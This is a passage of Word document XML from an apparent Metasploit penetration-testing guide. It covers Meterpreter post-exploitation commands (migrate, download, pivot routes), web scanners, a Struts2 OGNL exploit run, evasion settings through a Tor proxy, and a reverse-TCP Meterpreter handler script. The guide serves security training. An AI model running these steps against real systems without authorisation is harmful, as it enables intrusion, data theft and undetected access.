    <w:p w14:paraId="007FB878" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>exploit -j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED47550" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>Post-Exploitation Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A54DDC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Session Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA8E763" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># List active sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C17B2F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>sessions -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9F9915" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC0A0C1" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:lastRenderedPageBreak/>
        <w:t># Interact with session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E3FC0F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50498D29" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B94333" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Background current session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E53C52E" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC064C0" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E6214C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Kill session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58982AB6" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>sessions -k 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AB7A9B" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D8B7B21" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Route traffic through session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF6D44" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>route add 192.168.2.0/24 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140FA019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Basic Meterpreter Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367DA31E" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># System information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE78D0B" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1A9BFD" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DF0D34" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0A6AFE" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B769B6" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># File system operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5F6A58" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7F9C4C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739BB96B" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>cd /path/to/directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38252559" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>download file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04169B55" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>upload file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7251B0BE" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F650F3" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Process operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8C51B7" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6827D8B5" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>migrate &lt;pid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB18213" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>kill &lt;pid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D80970" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51EEF52A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Network information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5740202D" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521F48F8" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>netstat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153F3E25" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>arp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363FC212" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>Web Application Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470501F5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HTTP Auxiliary Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2628F08B" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:lastRenderedPageBreak/>
        <w:t># Directory enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA0C47D" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/http/dir_scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319EA788" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8DE81F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set DICTIONARY /usr/share/wordlists/dirb/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150EAD54" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C2E9A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2734C7E7" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># HTTP methods testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE5A96F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/http/http_put</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA1C9DC" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C9E226" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F5B4DC" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0428025D" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># SSL/TLS testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEF643C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/http/ssl_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E4F8FC" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7230B54F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A888C4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Web Application Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993A4CA" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Search for web application exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4025AE34" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>search webapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0098CC0C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>search type:exploit platform:php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D8A2F5" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F04622" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Example: Apache Struts exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BF3D02" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use exploit/multi/http/struts2_content_type_ognl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48945F30" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F149458" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set TARGETURI /vulnerable_app/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538BE0FD" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38432ED7" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>Best Practices for Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0468BB49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Documentation and Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E59671" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Enable logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C94C5C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>spool /path/to/logfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F83410F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2963BBE9" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Take screenshots (Meterpreter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722C9CDA" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348A54C7" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E31A41" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Save session transcript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5872FFC9" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>script -rec transcript.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECBA97F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7632410E" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Export database findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F6A0B7" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>db_export -f xml report.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10802BE1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Evasion and Stealth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20200E57" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Use evasion modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D2D60B" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>show evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A2932" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52BB200B" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Set evasion options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC92304" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set target::http::header::user_agent "Custom User Agent"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125150E2" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set tcp::max_send_size 1024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5498AE77" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0069E633" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Use delays between attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B0D345" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set ConnectTimeout 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA5E65F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set Proxies socks4:127.0.0.1:9050</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A838661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Resource Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C71619" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Create resource script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA79546" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>echo "use exploit/multi/handler" &gt; handler.rc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A167040" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>echo "set payload windows/meterpreter/reverse_tcp" &gt;&gt; handler.rc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DD2E93" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
